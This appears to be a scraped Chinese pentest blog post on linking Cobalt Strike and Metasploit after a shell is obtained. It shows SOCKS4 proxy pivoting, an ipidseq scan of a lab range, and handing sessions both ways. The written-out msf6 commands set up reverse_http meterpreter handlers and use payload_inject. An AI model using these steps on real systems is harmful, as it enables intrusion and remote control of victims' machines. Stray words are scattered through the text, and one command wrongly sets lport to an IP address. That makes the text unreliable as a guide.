通常在滲透的過程當中,Get到shell以後通常來講我喜歡上線到Cobaltstrike,可是Cobaltstrike的會話是60S更新一次,有時候功能也並無MSF完善(個人插件不夠厲害哈哈),那麼今天我準備記錄一下如何實現Cobaltstrike與MSF的聯動,而且在下面幾篇文章裏,我準備着重講一下隧道技術,尤爲是SSH隧道技術、SOCK4隧道技術、SOCK5隧道技術。html
首先Cobaltstrike獲取一個會話,而後搭建SockS。
shell
而後再view裏找到Proxy Pivots,點擊Tunnel查看代理設置。
打開Metasploit,設置Socks代理windows
msf6 > setg Proxies socks4:192.168.37.129:8265 //設置走Cobaltstrike的代理通道 Proxies => socks4:192.168.37.129:8265 msf6 > setg ReverseAllowProxy true //設置容許雙向通道 ReverseAllowProxy => true msf6 > use auxiliary/scanner/ip/ipidseq //設置尋找空閒主機 msf6 auxiliary(scanner/ip/ipidseq) > show options msf6 auxiliary(scanner/ip/ipidseq) > set RHOSTS 192.168.37.128-135 RHOSTS => 192.168.37.128-135 msf6 auxiliary(scanner/ip/ipidseq) > run
發現成功掃描到空閒主機:
安全
當Cobaltstrike獲取到上線主機後,有時候須要傳遞會話到MSF,操做以下:session
首先創建新的Foreign HTTP監聽器,設置IP爲MSF接收的IP,設置Port是一下子MSF監聽的端口
tcp
而後打開MSF,設置好監聽器:加密
msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http payload => windows/meterpreter/reverse_http msf6 exploit(multi/handler) > set lhost 192.168.37.134 lhost => 192.168.37.134 msf6 exploit(multi/handler) > set lport 8088 lport => 8088 msf6 exploit(multi/handler) > run -j
而後打開Cobaltstrike,轉發會話,方法以下,在會話欄裏選擇spawn,選擇payload爲剛纔設置的MSFpayload,選擇Choose後Metasploit接收到會話。spa
若是Metasploit已經獲取到了一個會話,能夠經過payload_inject模塊進行會話派生,將會話傳遞到Cobaltstrike。插件
這裏我嘗試先用MSF進行流量加密,再進行會話派生,具體可參照博客:https://www.cnblogs.com/culin/#/c/subject/p/15119863.html。3d
操做以下,首先Cobaltstrike創建新Becon HTTP的監聽器,設置好監聽的IP和Port
而後獲取到MSF的會話後,須要調用payload_inject模塊,方法以下
msf6> use exploit/windows/local/payload_inject msf6> set payload windows/meterpreter/reverse_http //注意payload的匹配 msf6> set session 2 //須要轉發會話的SESSION msf6> set lhost 192.168.34.129 //設置須要轉發的IP msf6> set lport 192.168.34.129 //設置須要轉發的port msf6> run //開始轉發
能夠成功看到會話就轉發成功了:
此時Cobaltstrike的會話也會被加密,更加的安全一。